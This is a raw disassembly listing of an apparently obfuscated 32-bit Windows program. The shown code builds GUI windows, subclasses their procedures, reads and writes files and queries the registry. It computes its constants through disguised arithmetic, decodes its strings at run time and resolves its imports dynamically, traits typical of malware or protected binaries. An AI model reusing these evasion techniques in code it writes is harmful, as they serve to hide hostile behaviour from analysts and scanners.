mov [ebp+var_10C], eax
push 0
push eax
push 0
push [ebp+var_12C]
mov eax, [ebp+var_110]
sub eax, [ebp+var_118]
push eax
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
push eax
movsx eax, word ptr ds:1001213Ch
add eax, ds:10012104h
sub eax, 9
push eax
mov eax, ds:100120DCh
sub eax, 8
push eax
push 50800000h
lea eax, [ebp+var_FF]
push eax
push 100135ABh
push 200h
call dword ptr ds:10010648h
mov [ebp+var_278], eax
mov eax, 30h
mul esi
mov [ebp+var_27C], eax
mov edi, [ebp+var_278]
mov ebx, eax
mov ds:1000F378h[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
movsx ebx, word ptr ds:10012140h
add ebx, 0F3h
sub edi, ebx
movsx ebx, word ptr ds:10012114h
add ebx, 39h
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, ds:100120C4h
movsx edx, word ptr ds:1001211Ch
add eax, edx
sub eax, 6
cmp [ebp+var_124], eax
jge short loc_41ECA4
mov eax, ds:100120B0h
sub eax, 4
mov [ebp+var_124], eax
loc_41ECA4: ; CODE XREF: sub_41E6BD+5D7�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word ptr ds:10012130h
add edx, 29h
sub eax, edx
mov [ebp+var_120], eax
push 100135A1h
call sub_41E33D
mov [ebp+var_280], eax
push 10013588h
call sub_41E33D
mov [ebp+var_284], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_288], eax
mov edi, eax
push dword ptr ds:1000F378h[edi]
movsx edi, word ptr ds:10012114h
add edi, 39h
push edi
push [ebp+var_120]
push [ebp+var_124]
movsx edi, word ptr ds:1001214Ch
add edi, 10h
push edi
push 50800000h
mov edi, [ebp+var_284]
push edi
mov edi, [ebp+var_280]
push edi
mov edi, ds:10012128h
add edi, ds:100120DCh
sub edi, 8
push edi
call dword ptr ds:10010648h
mov [ebp+var_138], eax
push 1001357Eh
call sub_41E33D
mov [ebp+var_28C], eax
push 1001357Ah
call sub_41E33D
add esp, 10h
mov [ebp+var_290], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov edi, eax
push dword ptr ds:1000F378h[edi]
mov edi, ds:10012104h
add edi, 0F8h
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, ds:100120BCh
add ebx, 36h
movsx edx, word ptr ds:100120F0h
add ebx, edx
add edi, ebx
mov ebx, ds:10012100h
add ebx, ds:100120D4h
sub ebx, 2
add edi, ebx
push edi
mov edi, ds:10012110h
add edi, 9
movsx ebx, word ptr ds:10012114h
add edi, ebx
push edi
push 50800009h
mov edi, [ebp+var_290]
push edi
mov edi, [ebp+var_28C]
push edi
mov edi, ds:100120D8h
movsx ebx, word ptr ds:10012108h
add edi, ebx
sub edi, 8
push edi
call dword ptr ds:10010648h
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:10012124h
sub eax, 2
push eax
movsx eax, word ptr ds:100120E4h
mov edx, eax
add edx, ds:1001210Ch
sub edx, 9
push edx
sub eax, 6
push eax
push 2BCh
mov eax, ds:100120E8h
sub eax, 6
push eax
movsx eax, word ptr ds:10012118h
add eax, ds:100120F8h
sub eax, 10h
push eax
movsx eax, word ptr ds:10012090h
add eax, 6
push eax
movsx eax, word ptr ds:10012114h
add eax, 11h
push eax
call dword ptr ds:1000F250h
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call dword ptr ds:1000C014h
push 0
push [ebp+var_10C]
push 0
push [ebp+var_13C]
mov eax, ds:10012138h
add eax, 0F8h
mov edx, ds:100120D0h
add edx, 4
sub eax, edx
push eax
mov eax, [ebp+var_120]
movsx edx, word ptr ds:10012114h
movsx ecx, word ptr ds:100120E0h
add edx, ecx
sub edx, 7
sub eax, edx
push eax
mov eax, ds:10012094h
add eax, ds:100120ACh
dec eax
push eax
mov eax, ds:10012128h
inc eax
push eax
push 50000000h
push 10013571h
push 10013573h
mov eax, ds:10012148h
sub eax, 2
push eax
call dword ptr ds:10010648h
mov [ebp+var_298], eax
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, [ebp+var_298]
mov ebx, eax
mov ds:1000F37Ch[ebx], edi
mov eax, ds:10012144h
add eax, ds:10012100h
cmp byte ptr [ebp+eax+var_102], 34h
jnz short loc_41EF56
push 1001356Ch
lea eax, [ebp+var_253]
push eax
call sub_42509D
jmp short loc_41EF6E
; ---------------------------------------------------------------------------
loc_41EF56: ; CODE XREF: sub_41E6BD+884�j
push 1001355Eh
call sub_41E33D
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_42509D
loc_41EF6E: ; CODE XREF: sub_41E6BD+897�j
push 100134ECh
call sub_41E33D
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call dword ptr ds:10011634h
push 100134E2h
call sub_41E33D
add esp, 18h
mov [ebp+var_2A0], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A4], eax
mov edi, eax
push dword ptr ds:1000F37Ch[edi]
mov edi, ds:10012104h
add edi, 26h
add edi, ds:100120DCh
push edi
push [ebp+var_120]
mov edi, ds:100120ECh
lea edi, [edi+edi+0Ah]
push edi
movsx edi, word ptr ds:100120B4h
add edi, 5
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, ds:100120E8h
movsx ebx, word ptr ds:10012114h
add edi, ebx
sub edi, 9
push edi
call dword ptr ds:10010648h
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
movsx eax, word ptr ds:100120B4h
add eax, ds:10012138h
sub eax, 7
push eax
movsx eax, word ptr ds:10012140h
sub eax, 7
push eax
mov edx, ds:10012134h
movsx ecx, word ptr ds:100120A0h
add edx, ecx
sub edx, 9
push edx
push 190h
push eax
mov eax, ds:10012124h
mov edx, eax
sub edx, 2
push edx
movsx edx, word ptr ds:100120E4h
push edx
mov edx, ds:100120DCh
lea eax, [eax+edx+6]
push eax
call dword ptr ds:1000F250h
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call dword ptr ds:1000C014h
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov [ebp+var_2AC], eax
push dword ptr ds:1000F37Ch[eax]
mov edx, ds:10012104h
add edx, 126h
add edx, ds:10012134h
push edx
mov edx, ds:10012144h
add edx, 2Ah
add edx, ds:10012110h
push edx
mov edx, ds:100120D0h
add edx, 4Bh
push edx
movsx edx, word ptr ds:100120B4h
add edx, 5
push edx
push 50800003h
push 100134D8h
push 100134D9h
mov edx, ds:100120ACh
add edx, ds:100120BCh
sub edx, 3
push edx
call dword ptr ds:10010648h
mov edi, [ebp+var_2AC]
mov ds:1000F380h[edi], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B0], eax
mov [ebp+var_2B4], eax
push dword ptr ds:1000F37Ch[eax]
mov edx, ds:100120FCh
add edx, 126h
add edx, ds:100120D8h
push edx
movsx edx, word ptr ds:100120A0h
add edx, 37h
push edx
mov edx, ds:100120ACh
add edx, 49h
push edx
movsx edx, word ptr ds:10012108h
add edx, 41h
push edx
push 50800003h
push 100134D8h
push 100134D9h
mov edx, ds:100120BCh
dec edx
push edx
call dword ptr ds:10010648h
mov edi, [ebp+var_2B4]
mov ds:1000F384h[edi], eax
mov eax, ds:100120BCh
add eax, ds:10012124h
sub eax, 2
mov [ebp+var_102], ax
jmp loc_41F283
; ---------------------------------------------------------------------------
loc_41F1CA: ; CODE XREF: sub_41E6BD+BDE�j
push 100134D0h
call sub_41E33D
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_2BE]
push eax
mov eax, ds:10012148h
sub eax, 2
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C4], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000C014h
push 100134C6h
call sub_41E33D
movzx edi, [ebp+var_102]
mov ebx, ds:10012104h
inc ebx
add ebx, ds:1001210Ch
add edi, ebx
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call dword ptr ds:10011634h
add esp, 20h
lea eax, [ebp+var_2BE]
push eax
movsx eax, word ptr ds:100120A4h
sub eax, 5
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C8], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000C014h
inc [ebp+var_102]
loc_41F283: ; CODE XREF: sub_41E6BD+B08�j
movzx eax, [ebp+var_102]
mov edx, ds:100120DCh
add edx, 2
add edx, ds:1001210Ch
cmp eax, edx
jl loc_41F1CA
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov [ebp+var_2BC], eax
push dword ptr ds:1000F37Ch[eax]
movsx edx, word ptr ds:100120F0h
movsx ecx, word ptr ds:100120A4h
lea edx, [edx+ecx+0Eh]
push edx
movsx edx, word ptr ds:1001214Ch
mov ecx, edx
add ecx, 51h
push ecx
mov ecx, ds:10012104h
add ecx, 7Ah
push ecx
add edx, 2Bh
push edx
push 50800000h
push 100134D8h
push 100134C1h
push 200h
call dword ptr ds:10010648h
mov edi, [ebp+var_2BC]
mov ds:1000F388h[edi], eax
mov eax, ds:100120ECh
add eax, ds:100120B0h
sub eax, 5
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp-2C0h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000C014h
push 100134B7h
call sub_41E33D
mov [ebp+var_2C4], eax
push 10013495h
call sub_41E33D
add esp, 8
mov [ebp+var_2C8], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov edi, eax
push dword ptr ds:1000F37Ch[edi]
movsx edi, word ptr ds:10012114h
add edi, 3Dh
push edi
push [ebp+var_120]
mov edi, ds:1001210Ch
add edi, 4Ch
push edi
movsx edi, word ptr ds:1001211Ch
mov ebx, ds:100120E8h
lea edi, [edi+ebx+8Eh]
push edi
push 50000000h
mov edi, [ebp+var_2C8]
push edi
mov edi, [ebp+var_2C4]
push edi
movsx edi, word ptr ds:100120E0h
sub edi, 8
push edi
call dword ptr ds:10010648h
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call dword ptr ds:1000C014h
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
mov [ebp+var_2D4], eax
push dword ptr ds:1000F37Ch[eax]
movsx edx, word ptr ds:1001212Ch
add edx, 13h
push edx
mov edx, ds:100120A8h
add edx, 92h
movsx ecx, word ptr ds:100120A0h
add edx, ecx
push edx
mov edx, ds:10012144h
add edx, 0FAh
add edx, ds:10012094h
mov ecx, ds:10012100h
add ecx, 20h
sub edx, ecx
push edx
mov edx, ds:100120C0h
add edx, 2
add edx, ds:10012098h
push edx
push 50800000h
push 10013477h
push 1001348Eh
push dword ptr ds:100120D0h
call dword ptr ds:10010648h
mov edi, [ebp+var_2D4]
mov ds:1000F38Ch[edi], eax
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2D8], eax
push dword ptr ds:1000F38Ch[eax]
call dword ptr ds:1000C014h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov [ebp+var_2E0], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_2E0]
mov ds:1000F390h[edi], eax
push 10003BF8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E4], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000E5F8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov [ebp+var_2EC], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_2EC]
mov ds:1000F394h[edi], eax
push 10003BF8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F0], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000E5F8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_2F8]
mov ds:1000F398h[edi], eax
push 10003BF8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000E5F8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push dword ptr ds:1000F37Ch[eax]
call dword ptr ds:10011628h
mov edi, [ebp+var_304]
mov ds:1000F39Ch[edi], eax
push 10003BF8h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push dword ptr ds:1000F37Ch[eax]
call dword ptr ds:1000E5F8h
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000EA40h
loc_41F611: ; CODE XREF: sub_41E6BD+10�j
; sub_41E6BD+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41E6BD endp
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h
db 10h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41F621: ; CODE XREF: .data:0041F649�j
mov eax, ds:10012100h
sub eax, 3
push eax
call dword ptr ds:10011630h
pop ecx
movsx eax, word ptr ds:100120E0h
sub eax, 8
push eax
push 10003941h
push 0
call dword ptr ds:1000C048h
jmp short loc_41F621
; ---------------------------------------------------------------------------
db 5Dh
db 0C2h, 4, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F64F proc near ; CODE XREF: .data:0041E163�p
; .data:0041E227�p
var_10014 = dword ptr -10014h
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_42507D
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, ds:1000F260h
cmp [ebp+arg_4], 43h
jnz short loc_41F674
lea edi, ds:1000E0F0h
loc_41F674: ; CODE XREF: sub_41F64F+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41F730
push 0
push 0
push esi
push edi
call dword ptr ds:10011B9Ch
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:1000C028h
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_41F6C6: ; CODE XREF: sub_41F64F+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F6C6
mov edx, ds:100120D0h
add edx, 2
add edx, ds:100120C0h
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, ds:10012124h
mov edx, ebx
add edx, ebx
mov ebx, [ebp+var_4]
mov [ebp+edx*4+var_10014+1], ebx
push 0
push 0
push esi
push edi
call dword ptr ds:10011B9Ch
push 0
lea eax, [ebp+var_4]
push eax
mov eax, ds:10012104h
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 3
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:10011B8Ch
push edi
call dword ptr ds:10010650h
loc_41F730: ; CODE XREF: sub_41F64F+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F64F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 158h
push ebx
push esi
push edi
call sub_421CFA
call sub_42068E
call sub_420CFE
call sub_422033
call sub_420503
call sub_41CCF0
call sub_420349
call sub_42215F
loc_41F769: ; CODE XREF: .data:0041F7C9�j
call sub_420587
mov ebx, eax
mov [ebp-45h], bl
movzx eax, byte ptr [ebp-45h]
movsx edx, word ptr ds:100120B8h
movsx ecx, word ptr ds:10012090h
add edx, ecx
sub edx, 2
cmp eax, edx
jnz short loc_41F79E
mov eax, ds:100120ECh
lea eax, [eax+eax+1]
push eax
call dword ptr ds:10011660h
loc_41F79E: ; CODE XREF: .data:0041F78C�j
movzx eax, byte ptr [ebp-45h]
movsx edx, word ptr ds:100120E0h
sub edx, 7
cmp eax, edx
jnz short loc_41F7CB
mov eax, ds:100120D4h
add eax, 60h
movsx edx, word ptr ds:1001214Ch
add eax, edx
push eax
call dword ptr ds:10011630h
pop ecx
jmp short loc_41F769
; ---------------------------------------------------------------------------
loc_41F7CB: ; CODE XREF: .data:0041F7AE�j
push 1001346Bh
call sub_41E33D
mov [ebp-154h], eax
push 10013461h
call sub_41E33D
mov esi, ds:100120FCh
add esi, ds:100120D4h
sub esi, 2
push esi
push eax
mov esi, [ebp-154h]
push esi
lea esi, [ebp-144h]
push esi
call dword ptr ds:10011634h
lea eax, [ebp-144h]
push eax
push 0
push 0
call dword ptr ds:1001161Ch
push 0
call dword ptr ds:1000E5E8h
mov edi, eax
push 10013457h
call sub_41E33D
mov [ebp-20h], eax
mov [ebp-34h], edi
lea eax, ds:1000884Ch
mov [ebp-40h], eax
push 7F00h
push 0
call dword ptr ds:1000F220h
mov [ebp-2Ch], eax
push 7F03h
push 0
call dword ptr ds:10011620h
mov [ebp-30h], eax
and dword ptr [ebp-24h], 0
push 0
call dword ptr ds:1000D120h
mov [ebp-28h], eax
mov dword ptr [ebp-44h], 3
mov eax, ds:10012138h
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 9
mov [ebp-3Ch], eax
mov eax, ds:100120B0h
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 0Ah
mov [ebp-38h], eax
lea eax, [ebp-44h]
push eax
call dword ptr ds:1000E0DCh
push 1001344Dh
call sub_41E33D
mov [ebp-158h], eax
push 10013443h
call sub_41E33D
push 0
push edi
push 0
push 0
movsx esi, word ptr ds:100120B8h
mov ebx, esi
add ebx, ds:100120C8h
sub ebx, 6
push ebx
sub esi, 2
push esi
movsx esi, word ptr ds:1001213Ch
sub esi, 7
push esi
mov esi, ds:100120C4h
sub esi, 4
push esi
push 0CA0000h
push eax
mov esi, [ebp-158h]
push esi
mov esi, ds:100120ACh
add esi, ds:10012134h
sub esi, 6
push esi
call dword ptr ds:10010648h
mov ds:1000E60Ch, eax
lea eax, [ebp-148h]
push eax
push edi
call sub_41D699
add esp, 2Ch
mov [ebp-14Ch], eax
mov ds:10011610h, eax
mov eax, [ebp-148h]
mov ds:1000E610h, eax
call sub_41A8E7
lea eax, [ebp-150h]
push eax
mov eax, ds:100120B0h
sub eax, 5
push eax
push 0
push 10001324h
mov eax, ds:1001209Ch
add eax, ds:10012124h
sub eax, 5
push eax
push 0
call dword ptr ds:10011B90h
push eax
call dword ptr ds:10010650h
call sub_41DD73
call sub_41CAC7
jmp short loc_41F99B
; ---------------------------------------------------------------------------
loc_41F987: ; CODE XREF: .data:0041F9BD�j
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1001177Ch
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000C050h
loc_41F99B: ; CODE XREF: .data:0041F985�j
movsx eax, word ptr ds:100120A0h
sub eax, 5
push eax
mov eax, ds:100120C8h
sub eax, 4
push eax
push 0
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000F368h
or eax, eax
jnz short loc_41F987
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F9C6 proc near ; CODE XREF: sub_420E93+193�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, ds:10012100h
sub eax, 3
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:1000E5ECh
mov edi, eax
or edi, edi
jz short loc_41F9F3
xor eax, eax
jmp short loc_41FA20
; ---------------------------------------------------------------------------
loc_41F9F3: ; CODE XREF: sub_41F9C6+27�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call dword ptr ds:1000C03Ch
mov edi, eax
push [ebp+var_4]
call dword ptr ds:10011618h
or edi, edi
jz short loc_41FA1D
xor eax, eax
jmp short loc_41FA20
; ---------------------------------------------------------------------------
loc_41FA1D: ; CODE XREF: sub_41F9C6+51�j
xor eax, eax
inc eax
loc_41FA20: ; CODE XREF: sub_41F9C6+2B�j
; sub_41F9C6+55�j
pop edi
leave
retn
sub_41F9C6 endp
; =============== S U B R O U T I N E =======================================
sub_41FA23 proc near ; CODE XREF: .data:004202FD�p
push edi
push 10013435h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012158h, eax
test eax, eax
jnz short loc_41FA56
push 10013427h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012158h, eax
loc_41FA56: ; CODE XREF: sub_41FA23+1A�j
push 1001341Dh
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10011630h, eax
push 10013412h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000C030h, eax
push 1001340Ah
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000C054h, eax
push 10013402h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000EA38h, eax
push 100133F8h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000EA2Ch, eax
push 100133EEh
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10011648h, eax
push 100133E4h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10010634h, eax
push 100133DAh
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10010640h, eax
push 100133D2h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10011BACh, eax
push 100133C9h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10011600h, eax
push 100133BFh
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000C020h, eax
push 100133B4h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:10011634h, eax
push 100133A8h
call sub_41E33D
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000F24Ch, eax
push 1001339Eh
call sub_41E33D
add esp, 38h
push eax
push dword ptr ds:10012158h
call dword ptr ds:1000E1F8h
mov ds:1000E1F4h, eax
pop edi
retn
sub_41FA23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FBE3 proc near ; CODE XREF: sub_4242AF+14C�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_42507D
push ebx
push esi
push edi
mov eax, ds:100120DCh
add eax, ds:100120ECh
sub eax, 8
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_42221E
add esp, 8
movsx edi, word ptr ds:10012090h
sub edi, 2
jmp short loc_41FC37
; ---------------------------------------------------------------------------
loc_41FC1D: ; CODE XREF: sub_41FBE3+5A�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_41FC36
mov eax, ds:100120B0h
sub eax, 5
mov [ebp+edi+var_FFF], al
loc_41FC36: ; CODE XREF: sub_41FBE3+42�j
inc edi
loc_41FC37: ; CODE XREF: sub_41FBE3+38�j
cmp edi, 0FFFh
jb short loc_41FC1D
lea esi, [ebp+var_FFF]
loc_41FC45: ; CODE XREF: sub_41FBE3+F9�j
push 1001339Ah
call sub_41E33D
push 1000D020h
mov ebx, ds:10012110h
movsx edx, word ptr ds:100120F4h
add edx, ebx
sub edx, 8
push edx
add ebx, ds:100120D8h
sub ebx, 0Bh
push ebx
push eax
movsx ebx, word ptr ds:10012130h
mov edx, ebx
sub edx, 4
push edx
push 0
push esi
push [ebp+arg_0]
mov edx, ds:10012134h
add edx, ebx
mov ebx, edx
sub ebx, 6
and ebx, 0FFh
push ebx
call sub_4206FE
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41FCA6: ; CODE XREF: sub_41FBE3+C8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FCA6
movsx edx, word ptr ds:100120E4h
add edx, ds:10012100h
sub edx, 8
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, ds:10012148h
movsx ecx, word ptr ds:100120F0h
add edx, ecx
sub edx, 7
cmp eax, edx
jnz loc_41FC45
pop edi
pop esi
pop ebx
leave
retn
sub_41FBE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FCE7 proc near ; CODE XREF: sub_41A910+6B2�p
; .data:0041BE53�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41FCFC: ; CODE XREF: sub_41FCE7+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FCFC
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_41FD0E: ; CODE XREF: sub_41FCE7+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FD0E
mov esi, eax
movsx eax, word ptr ds:100120F4h
movsx edx, word ptr ds:10012118h
add eax, edx
sub eax, 9
mov [ebp+var_4], eax
jmp short loc_41FD7F
; ---------------------------------------------------------------------------
loc_41FD2F: ; CODE XREF: sub_41FCE7+9E�j
movsx ebx, word ptr ds:10012118h
sub ebx, 9
mov eax, ds:100120F8h
mov edi, eax
add edi, ds:100120BCh
sub edi, 8
jmp short loc_41FD78
; ---------------------------------------------------------------------------
loc_41FD4B: ; CODE XREF: sub_41FCE7+93�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_41FD7C
inc ebx
cmp ebx, esi
jnz short loc_41FD77
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_41FD77
mov eax, [ebp+var_4]
jmp short loc_41FD8C
; ---------------------------------------------------------------------------
loc_41FD77: ; CODE XREF: sub_41FCE7+7E�j
; sub_41FCE7+89�j
inc edi
loc_41FD78: ; CODE XREF: sub_41FCE7+62�j
cmp edi, esi
jb short loc_41FD4B
loc_41FD7C: ; CODE XREF: sub_41FCE7+79�j
inc [ebp+var_4]
loc_41FD7F: ; CODE XREF: sub_41FCE7+46�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_41FD2F
mov eax, 0FFFFh
loc_41FD8C: ; CODE XREF: sub_41FCE7+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FCE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD91 proc near ; CODE XREF: sub_41E6BD+491�p
; sub_41E6BD+4A2�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_42507D
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call dword ptr ds:1000C004h
mov edi, eax
loc_41FDAE: ; CODE XREF: sub_41FD91+7C�j
or edi, edi
jnz short loc_41FDB6
xor eax, eax
jmp short loc_41FE0F
; ---------------------------------------------------------------------------
loc_41FDB6: ; CODE XREF: sub_41FD91+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call dword ptr ds:1000D010h
mov eax, ds:10012128h
lea eax, [eax+eax+1]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_41FCE7
add esp, 0Ch
mov esi, ds:100120A8h
add esi, 0FFF6h
movsx ebx, word ptr ds:10012108h
add esi, ebx
cmp eax, esi
jz short loc_41FE02
mov eax, edi
jmp short loc_41FE0F
; ---------------------------------------------------------------------------
loc_41FE02: ; CODE XREF: sub_41FD91+6B�j
push 2
push edi
call dword ptr ds:1000C004h
mov edi, eax
jmp short loc_41FDAE
; ---------------------------------------------------------------------------
loc_41FE0F: ; CODE XREF: sub_41FD91+23�j
; sub_41FD91+6F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FD91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE14 proc near ; CODE XREF: .data:0041CFF1�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
